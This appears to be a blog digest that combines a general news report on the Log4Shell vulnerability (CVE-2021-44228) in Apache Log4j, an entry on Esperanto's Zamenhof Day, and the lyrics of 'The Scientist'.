Log4Shell is the new zeroday flaw: a bug present in most applications, and very easily exploitable

Log4Shell is a new zeroday vulnerability discovered last Thursday when it was exploited to remotely compromise Minecraft servers. The vulnerability was traced with the code CVE-2021-44228 and was assigned a severity level of 10 out of 10 as it can be exploited very easily and allows the execution of remote unauthenticated code.

The vulnerability concerns in particular Log4j, an open source event logging tool based on Java and available from Apache that is used by hundreds of thousands of apps, especially in the cloud and including those commonly used in almost all companies on the planet. .

Event logging is a process by which applications keep an up-to-date list of the activities performed and which can thus be analyzed later in the event of errors. Almost all network security systems run some kind of event log, which gives libraries such as Log4j nearly endless coverage.

The exploitation of the vulnerability occurs by managing to have a special sequence of characters recorded on the log, as Cloudflare illustrated in detail in its analysis. And, as mentioned, the vulnerability can be exploited with ease: in the case of Minecraft, for example, it was possible to record the sequence of characters on the log simply by sending a message in the chat within the game.

Since the compromise of the Minecraft servers occurred, the security company Greynoise has detected an active scan in progress on the Internet that attempted to identify vulnerable servers. The researchers point out that they have observed that the vulnerability is exploited for various purposes: from the installation of malware to cryptomining, to the hardening of Linux botnets, passing from the extraction of data and configurations.

15th December (’21): Zamenhof Day

Zamenhof Day (EsperantoZamenhofa Tago, Polish: Dzień Zamenhofa), also called Esperanto Book Day, is celebrated on 15 December, the birthday of Esperanto creator L. L. Zamenhof.It is the most widely celebrated day in Esperanto culture. On this day, Esperantists hold information sessions and cultural gatherings to promote literature in Esperanto.

The history of celebrating Esperanto on Zamenhof’s birthday can be traced back to 17 December 1878, when at a birthday party for his 19th birthday he presented to his friends his Lingwe uniwersala, the first version of his international language. By 1887, this language had evolved into what is now recognized as Esperanto when he published the Unua Libro. 15 December previously used to be also known as Esperanto Day, but that is now celebrated on 26 July, the day Unua Libro was published.

15 December 2009 marked 150 years since Zamenhof’s birth, and there were several events to celebrate. On this date, the authorities in his home town of Białystok, Poland, opened a new Zamenhof Center, and a symposium honoring Zamenhof was held in New York City, featuring talks by Arika Okrent and Humphrey Tonkin among other professors.

Also on this date, the search engine Google, in 33 national language versions (but not the international English one), bore a special version of their logo (a Doodle) emblazoned with the Esperanto flag in honor of the occasion, which generated, on the 30 biggest Wikipedia languages, 1,750,000 page views on the articles “L. L. Zamenhof“.

♬ ZUCCHERO – The Scientist


LYRIC
Come up to meet you
Tell you I’m sorry
Don’t know how lovely you are
I had to find you
Tell you I need you
Tell you I set you apart

Tell me your secrets
And ask me your questions
Oh, let’s go back to the start
Running in circles
Coming up tails
Heads on a science apart

Nobody said it was easy
It’s such a shame for us to part
Nobody said it was easy
No one ever said it would be this hard
Oh, take me back to the start

I was just guessing
At numbers and figures
Pulling your puzzles apart
Questions of science
Science and progress
Don’t speak as loud as my heart

Tell me you love me
Come back and haunt me
Oh, and I rush to the start
Running in circles
Chasing our tails
Coming back as we are

Nobody said it was easy
It’s such a shame for us to part
Nobody said it was easy
No one ever said it would be so hard
I’m going back to the start